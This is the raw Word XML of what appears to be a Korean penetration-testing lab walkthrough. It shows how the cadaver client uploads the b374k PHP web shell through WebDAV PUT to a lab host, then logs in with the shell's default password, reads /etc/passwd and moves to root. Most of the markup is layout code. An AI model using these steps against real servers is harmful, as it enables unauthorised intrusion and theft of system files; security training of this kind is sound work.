        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6328606D" w14:textId="77777777" w:rsidR="000E54A6" w:rsidRDefault="008112DB" w:rsidP="000E54A6">
      <w:pPr>
        <w:ind w:firstLine="80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842863" wp14:editId="20705720">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>540385</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1460495</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="858510" cy="155454"/>
                <wp:effectExtent l="19050" t="19050" r="18415" b="16510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10" cy="1554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10B3A" id="직사각형 53" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:42.55pt;margin-top:115pt;width:67.6pt;height:12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263567" wp14:editId="69FAFE8E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>566992</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>134387</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4203942" cy="141494"/>
                <wp:effectExtent l="19050" t="19050" r="25400" b="11430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942" cy="1414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99273" id="직사각형 52" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:44.65pt;margin-top:10.6pt;width:331pt;height:11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" filled="f" strokecolor="#c00000" strokeweight="2.25pt">
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000E54A6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4265111A" wp14:editId="60ED6C1F">
            <wp:extent cx="5760000" cy="1598382"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="209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449"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="1598382"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9522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3EBD1" w14:textId="77777777" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="000E54A6">
      <w:pPr>
        <w:ind w:firstLine="800"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F081DC0" w14:textId="77777777" w:rsidR="000E54A6" w:rsidRDefault="000E54A6" w:rsidP="000E54A6">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">adaver’ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">UT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">메소드를 이용하여 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/webdav</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">에 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>‘b374k’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 웹 쉘 업로드</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62651838" w14:textId="4F468891" w:rsidR="008868CF" w:rsidRDefault="008868CF" w:rsidP="008868CF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cadaver: </w:t>
      </w:r>
      <w:r w:rsidR="00416593">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">리눅스용 </w:t>
      </w:r>
      <w:r w:rsidR="00416593">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">WebDAV </w:t>
      </w:r>
      <w:r w:rsidR="00416593">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>클라이언트 도구로,</w:t>
      </w:r>
      <w:r w:rsidR="00416593">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00416593">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>원격 서버를 대상으로 파일을 추가</w:t>
      </w:r>
      <w:r w:rsidR="00416593">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00416593">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>수정/삭제할 수</w:t>
      </w:r>
      <w:r w:rsidR="00416593">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00416593">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>있음</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112B49A0" w14:textId="33D3EBC0" w:rsidR="008112DB" w:rsidRDefault="008112DB" w:rsidP="008112DB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1840"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>adaver http://192.168.0.146/webdav</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06418DE8" w14:textId="5FF1FE76" w:rsidR="00EF1860" w:rsidRDefault="008112DB" w:rsidP="00416593">
      <w:pPr>
        <w:ind w:firstLine="80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A05BFB" wp14:editId="3EB3F9F5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>580390</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>97795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1900492" cy="139065"/>
                <wp:effectExtent l="19050" t="19050" r="24130" b="1333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492" cy="139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A6A85" id="직사각형 54" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:45.7pt;margin-top:7.7pt;width:149.65pt;height:10.9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" filled="f" strokecolor="#c00000" strokeweight="2.25pt">
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000E54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7A32CA1" wp14:editId="57CFF51F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>94232</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="margin">
                  <wp:posOffset>-289676</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6772275" cy="10253844"/>
                <wp:effectExtent l="0" t="0" r="9525" b="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02538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CE239" w14:textId="4AD434F8" w:rsidR="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="000E54A6">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="4A00E8E8" w14:textId="77777777" w:rsidR="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="000E54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32CA1" id="직사각형 28" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:7.4pt;margin-top:-22.8pt;width:533.25pt;height:807.4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" fillcolor="white [3212]" stroked="f" strokeweight="1pt">
                <v:fill opacity="27499f"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="73CCE239" w14:textId="4AD434F8" w:rsidR="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="000E54A6">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="4A00E8E8" w14:textId="77777777" w:rsidR="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="000E54A6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E54A6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03ABC404" wp14:editId="3A6EE2FB">
            <wp:extent cx="5760000" cy="1447229"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="196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47229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A75CEE" w14:textId="77777777" w:rsidR="000E54A6" w:rsidRDefault="000E54A6" w:rsidP="000E54A6">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>‘b374k’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 파일 업로드 결과 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">‘b374k-3.2.2.php’ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>파일이 올라온것을 확인 후 클릭</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BDCC7A" w14:textId="3161D8ED" w:rsidR="00EF1860" w:rsidRPr="000E54A6" w:rsidRDefault="008112DB" w:rsidP="008868CF">
      <w:pPr>
        <w:ind w:firstLine="80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BE8D05" wp14:editId="180E7098">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>518130</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1550544</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2389103" cy="148474"/>
                <wp:effectExtent l="19050" t="19050" r="11430" b="2349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103" cy="1484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8F159" id="직사각형 55" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:40.8pt;margin-top:122.1pt;width:188.1pt;height:11.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" filled="f" strokecolor="#c00000" strokeweight="2.25pt">
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008868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AF649D7" wp14:editId="6B357F9A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>600293</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="margin">
                  <wp:posOffset>-247794</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6772275" cy="10504630"/>
                <wp:effectExtent l="0" t="0" r="9525" b="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0504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51817" w14:textId="77777777" w:rsidR="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="00EF18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649D7" id="직사각형 38" o:spid="_x0000_s1027" style="position:absolute;left:0;text-align:left;margin-left:47.25pt;margin-top:-19.5pt;width:533.25pt;height:827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" fillcolor="white [3212]" stroked="f" strokeweight="1pt">
                <v:fill opacity="27499f"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="61951817" w14:textId="77777777" w:rsidR="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="00EF1860">
                      <w:pPr>
                        <w:jc w:val="cente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0E54A6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B69CD3E" wp14:editId="639FA384">
            <wp:extent cx="5760000" cy="2131209"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="2159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31209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0E54A6" w:rsidRPr="000E54A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124427B2" w14:textId="6C1032CC" w:rsidR="000E54A6" w:rsidRDefault="000E54A6" w:rsidP="000E54A6">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">패스워드는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>b37</w:t>
      </w:r>
      <w:r w:rsidR="008112DB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">k </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>입력 후 E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB39A46" w14:textId="0B67C96A" w:rsidR="000E54A6" w:rsidRPr="000E54A6" w:rsidRDefault="008112DB" w:rsidP="000E54A6">
      <w:pPr>
        <w:ind w:left="80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A68FAC" wp14:editId="28E25680">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2844208</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>341664</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1095884" cy="474650"/>
                <wp:effectExtent l="0" t="0" r="0" b="190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884" cy="4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3D3E7" w14:textId="0FAB1C9F" w:rsidR="005E13EB" w:rsidRPr="008112DB" w:rsidRDefault="005E13EB" w:rsidP="008112DB">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="C00000"/>
                                <w14:textOutline w14:w="12700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12DB">
                              <w:rPr>
                                <w:color w:val="C00000"/>
                                <w14:textOutline w14:w="12700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37</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="C00000"/>
                                <w14:textOutline w14:w="12700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8112DB">
                              <w:rPr>
                                <w:color w:val="C00000"/>
                                <w14:textOutline w14:w="12700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68FAC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8" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:223.95pt;margin-top:26.9pt;width:86.3pt;height:37.3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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6133D3E7" w14:textId="0FAB1C9F" w:rsidR="005E13EB" w:rsidRPr="008112DB" w:rsidRDefault="005E13EB" w:rsidP="008112DB">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="C00000"/>
                          <w14:textOutline w14:w="12700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12DB">
                        <w:rPr>
                          <w:color w:val="C00000"/>
                          <w14:textOutline w14:w="12700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b37</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="C00000"/>
                          <w14:textOutline w14:w="12700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8112DB">
                        <w:rPr>
                          <w:color w:val="C00000"/>
                          <w14:textOutline w14:w="12700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464827" wp14:editId="1C5531CB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>3037966</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>661305</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="720846" cy="176395"/>
                <wp:effectExtent l="19050" t="19050" r="22225" b="14605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46" cy="176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F8AE7" id="직사각형 56" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:239.2pt;margin-top:52.05pt;width:56.75pt;height:13.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" filled="f" strokecolor="#c00000" strokeweight="2.25pt">
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000E54A6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5777A38B" wp14:editId="486F67B6">
            <wp:extent cx="5760000" cy="1133081"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="1016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33081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4325BA1" w14:textId="5BAB60FC" w:rsidR="00D3530D" w:rsidRDefault="000E54A6" w:rsidP="000E54A6">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">374k </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>웹 쉘 실행 완료</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9B2B6E" w14:textId="169B8AE4" w:rsidR="008868CF" w:rsidRPr="000E54A6" w:rsidRDefault="008112DB" w:rsidP="008868CF">
      <w:pPr>
        <w:ind w:left="8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2BFA88" wp14:editId="266851AC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>580952</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1358832</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5648834" cy="134513"/>
                <wp:effectExtent l="19050" t="19050" r="28575" b="18415"/>
                <wp:wrapNone/>
                <wp:docPr id="67" name="직사각형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834" cy="1345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802B3" id="직사각형 67" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:45.75pt;margin-top:107pt;width:444.8pt;height:1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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000E54A6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="443F7E61" wp14:editId="7977A357">
            <wp:extent cx="5760000" cy="3101469"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="2286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67"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="3101469"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9522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4DF84" w14:textId="77777777" w:rsidR="00D3530D" w:rsidRDefault="000E54A6" w:rsidP="000E54A6">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:leftChars="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387C3BE" wp14:editId="2AD98679">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>104703</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionV>
                <wp:extent cx="6772275" cy="10253844"/>
                <wp:effectExtent l="0" t="0" r="9525" b="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02538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E94CE" w14:textId="77777777" w:rsidR="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="000E54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7C3BE" id="직사각형 33" o:spid="_x0000_s1029" style="position:absolute;left:0;text-align:left;margin-left:8.25pt;margin-top:0;width:533.25pt;height:807.4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" fillcolor="white [3212]" stroked="f" strokeweight="1pt">
                <v:fill opacity="27499f"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6E0E94CE" w14:textId="77777777" w:rsidR="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="000E54A6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hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">상위 폴더로 이동하여 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">etc/passwd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>파일 출력</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1FA89D" w14:textId="77777777" w:rsidR="000E54A6" w:rsidRDefault="000E54A6" w:rsidP="000E54A6">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45D4CE76" wp14:editId="3236EABC">
            <wp:extent cx="5760000" cy="3932092"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="1143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32092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79168F0" w14:textId="16541E9C" w:rsidR="00EF1860" w:rsidRDefault="008868CF" w:rsidP="000E54A6">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b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426FD4C" wp14:editId="56D0100B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>457200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="margin">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6772275" cy="10504630"/>
                <wp:effectExtent l="0" t="0" r="9525" b="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0504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3208A" w14:textId="77777777" w:rsidR="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="008868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6FD4C" id="직사각형 40" o:spid="_x0000_s1030" style="position:absolute;left:0;text-align:left;margin-left:36pt;margin-top:0;width:533.25pt;height:827.1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" fillcolor="white [3212]" stroked="f" strokeweight="1pt">
                <v:fill opacity="27499f"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3B93208A" w14:textId="77777777" w:rsidR="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="008868CF">
                      <w:pPr>
                        <w:jc w:val="cente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75946AD2" w14:textId="77777777" w:rsidR="000E54A6" w:rsidRDefault="00FA66E1" w:rsidP="000E54A6">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">xplorer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">환경 또는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>환경도 사용 가능</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D2E7AF" w14:textId="77777777" w:rsidR="00FA66E1" w:rsidRDefault="00FA66E1" w:rsidP="00FA66E1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[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>클릭 후 r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">oot </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>계정으로 이동</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0F05E9" w14:textId="77777777" w:rsidR="00FA66E1" w:rsidRDefault="00FA66E1" w:rsidP="00FA66E1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1840"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"># etc/passwd </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A626D3F" w14:textId="77777777" w:rsidR="00FA66E1" w:rsidRDefault="008112DB" w:rsidP="00FA66E1">
      <w:pPr>
        <w:ind w:left="8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57D1AD" wp14:editId="5330EA5B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>531495</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>826775</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="797560" cy="118149"/>
                <wp:effectExtent l="19050" t="19050" r="21590" b="1524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1181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D237" id="직사각형 60" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:41.85pt;margin-top:65.1pt;width:62.8pt;height:9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7F1483" wp14:editId="401740B2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>862049</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>624418</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="348658" cy="160040"/>
                <wp:effectExtent l="19050" t="19050" r="13335" b="1143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58" cy="16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6D51E" id="직사각형 59" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:67.9pt;margin-top:49.15pt;width:27.45pt;height:12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" filled="f" strokecolor="#c00000" strokeweight="2.25pt">
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00FA66E1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D39AB6F" wp14:editId="6BB134A6">
            <wp:extent cx="5760000" cy="3613621"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="2540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13621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End w:id="1"/>
    </w:p>
    <w:p w14:paraId="59C08826" w14:textId="3FE125D9" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00FA66E1">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B75C9C1" w14:textId="30C9B560" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00FA66E1">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="453FE98F" w14:textId="3FEFE9F1" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00FA66E1">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71EE97F7" w14:textId="6948E1A1" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00FA66E1">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C04C3EB" w14:textId="4DDCCD76" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00FA66E1">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
